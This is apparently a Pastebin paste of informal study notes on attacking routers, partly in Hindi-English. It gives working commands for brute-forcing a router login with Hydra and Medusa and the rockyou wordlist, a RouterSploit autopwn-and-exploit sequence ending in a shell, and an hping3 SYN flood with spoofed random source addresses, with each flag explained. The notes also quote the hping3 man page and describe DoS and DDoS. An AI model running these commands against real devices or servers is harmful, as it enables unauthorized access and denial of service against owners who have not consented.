Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Penetration Testing Of Routers
- -------------------------------
- Every router has it's own login page. We need to provide username and password to enter the router's interface.
- route -n ---> gateway address
- 192.168.0.1
- username
- password
- username ---> admin/Admin
- default ---> 50%
- hydra
- medusa
- They both are brute forcing tools which can be used to crack the authentication forms. They bypass or crack the protocls such as ftp, ssh, telnet, http, https. Hydra is comparitively slow. Medusa, it is fast and provides various protocols to work with.
- hydra -s 80 -l admin -P /usr/share/wordlists/rockyou.txt 192.168.0.1 http-get
- medusa -h 192.168.0.1 -U /usr/share/wordlists/rockyou.txt -P /usr/share/wordlists/rockyou.txt -e ns -t 1 -v 5 -f -M http
- routersploit --> it is a router exploiting framework. which uses already existing router exploits and perform them accordingly.
- https://github.com/reverse-shell/routersploit
- >./rsf.py
- >use scanners/autopwn
- >set target 192.168.0.1
- >run
- -------
- got an exploit
- -------
- >use exploit/<path>
- > show options
- > set target 192.168.0.1
- > run
- shell access
- DoS --> Denial Of Service ---> A large amount of data or traffic is being send to the web server from one device only. It results in crashing of web services, server down, loss of company.
- They will monitor the IP Address.... If the traffic from that IP Address is un-necessary and huge in amount as compare to regular traffic..... Blacklist that IP Address
- DDoS ---> Distributed Denial of Service ---> It is distributed dos attack.... The traffic here will be send by multiple IP Address but to a single web server.
- hping3
- hping3 is a network tool able to send custom TCP/IP packets and to dis‐
- play target replies like ping program does with ICMP replies. hping3
- handle fragmentation, arbitrary packets body and size and can be used
- in order to transfer files encapsulated under supported protocols.
- Using hping3 you are able to perform at least the following stuff:
- - Test firewall rules
- - Advanced port scanning
- - Test net performance using different protocols,
- packet size, TOS (type of service) and fragmentation.
- - Path MTU discovery
- - Transferring files between even really fascist firewall
- rules.
- - Traceroute-like under different protocols.
- - Firewalk-like usage.
- - Remote OS fingerprinting.
- - TCP/IP stack auditing.
- - A lot of others.
- It's also a good didactic tool to learn TCP/IP. hping3 is developed
- and maintained by antirez@invece.org and is licensed under GPL version
- 2. Development is open so you can send me patches, suggestion and
- affronts without inhibitions.
- hping3 -c 10000 -d 120 -S -w 64 -p 21 --flood --rand-source 172.16.79.141
- -c ---> count ---> number of packets to be send
- -d ---> size of each packet
- -p ---> port number
- --flood ---> stop nahi krna----> start flooding the service
- --rand-source ---> jaha se aaya hai... uska address kuch bhi bta do
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement